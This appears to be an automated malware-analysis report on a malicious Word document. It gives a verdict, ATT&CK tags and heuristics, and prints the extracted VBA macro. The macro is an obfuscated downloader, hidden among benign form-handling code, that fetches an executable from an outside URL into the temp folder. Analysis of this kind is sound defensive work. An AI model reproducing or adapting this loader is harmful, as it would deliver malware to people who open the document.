Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro runs when the document is opened and uses 'CallByName' to invoke a function that assembles and downloads a payload from the URL "http://atfsys.co.uk/9/01.exe". This indicates a macro-based downloader attack, likely delivered via spearphishing.
Heuristics (4)

- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4634 bytes | 1a47b8a74763bbf4048f66d1d10c5f67c1f189c2a19225950b8789b04024f86c |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function CategoriseField(FieldName As String) As String
Dim Category As String
Category = "Undefined"
Dim CatBnd As Integer, FieldBnd As Integer, CatItr As Integer, FieldItr As Integer
Dim ThisField As String
CatBnd = UBound(FieldHeadings, 1)
For CatItr = 0 To CatBnd
FieldBnd = UBound(FieldHeadings(CatItr, 1)(1), 1)
For FieldItr = 0 To FieldBnd
ThisField = FieldHeadings(CatItr, 1)(1)(FieldItr)
If ThisField = FieldName Then
Category = FieldHeadings(CatItr, 0)
CategoriseField = Category
Exit For
End If
Next FieldItr
If CategoriseField = Category Then
Exit For
End If
Next CatItr
' If AddControl = "AddControl" Then
' Select Case Category
'
'
' End If
End Function
Sub URTniRUwGB()
EDc1mFJHKrRm0 = Chr(61) & Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(60) & Chr(47) & Chr(97) & Chr(116) & Chr(102) & "x" & Chr(115) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & "s" & Chr(46) & "c" & Chr(111) & Chr(46) & "u" & "k" & "/" & Chr(57) & "9" & Chr(47) & Chr(48) & Chr(49) & "." & Chr(59) & "e" & Chr(120) & Chr(101)
Dim kljhnIOH As String
kljhnIOH = "M" & Chr(105) & Chr(99) & Chr(114) & Chr(61) & "o" & "s" & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(59) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(60) & "T" & Chr(84) & "P"
For DGxsbHsZ = 59 To 61
kljhnIOH = Replace(kljhnIOH, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set KgJquztrTap = VvC0OQ6h8(kljhnIOH)
For DGxsbHsZ = 59 To 61
EDc1mFJHKrRm0 = Replace(EDc1mFJHKrRm0, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False
Dim EJJFEF As String
EJJFEF = "W" & Chr(83) & Chr(99) & Chr(60) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & "." & Chr(59) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(61) & Chr(108)
For DGxsbHsZ = 59 To 61
EJJFEF = Replace(EJJFEF, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set SmuuuU81PmD = VvC0OQ6h8(EJJFEF)
Set K2BAN3ePSzEUUZ = CallByName(SmuuuU81PmD, Chr(69) & Chr(110) & "v" & Chr(105) & "r" & "o" & Chr(110) & Chr(109) & Chr(101) & Chr(110) & "t", VbGet, Chr(80) & Chr(114) & Chr(111) & "c" & "e" & Chr(115) & Chr(115))
YYRGHi07Vig = K2BAN3ePSzEUUZ("T" & "E" & Chr(77) & Chr(80))
Iw1u5AAHYx = YYRGHi07Vig & "\" & "d" & "i" & "k" & Chr(111) & Chr(61) & Chr(112) & Chr(105) & Chr(114) & Chr(116) & "." & Chr(60) & "e" & Chr(59) & Chr(120) & "e"
For DGxsbHsZ = 59 To 61
Iw1u5AAHYx = Replace(Iw1u5AAHYx, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Dim pI78nXO4LvafL7() As Byte
CallByName KgJquztrTap, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
pI78nXO4LvafL7 = CallByName(KgJquztrTap, "r" & Chr(101) & "s" & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & "d" & Chr(121), VbGet)
Ajh6bff8yWYHO pI78nXO4LvafL7, Iw1u5AAHYx
On Error GoTo ZIyC6gTRQV
a = 233 / 0
On Error GoTo 0
O1pmpYMO:
Exit Sub
ZIyC6gTRQV:
NvPfGv8GF2j 33, "mt0ja19PZDhQ4k", "dvEWVewvwe"
Resume O1pmpYMO
End Sub
Sub AddToEntryForm_Deprecated(ListOfFields As Variant, Optional Category As String, Optional SampleNum As Integer)
Dim CurrentField As Variant, CurrFieldName As String, CurrFieldCat As String
For Each CurrentField In ListOfFields
CurrFieldName = ListOfFields()()
CurrFieldCat = CategoriseField(CurrFieldName)
Select Case CurrFieldCat
Case "Description":
' Consider SampleNum to return Frame to add control to
' NewEntry_frm.Description_frame.Controls.Add
'Function to return controls on multipage
'Function to populate multipage with all controls
'Consider adding management page for validations
'Override
'Shade non-applicable fields//& hide?
' Add to desc frame Description_Frame
''''//
'Add to all multipage objects according to site restriction | Replicate when adding more samples
End Select
Next CurrentField
End Sub
Sub ShowAllFields()
End Sub
Attribute VB_Name = "Module2"
```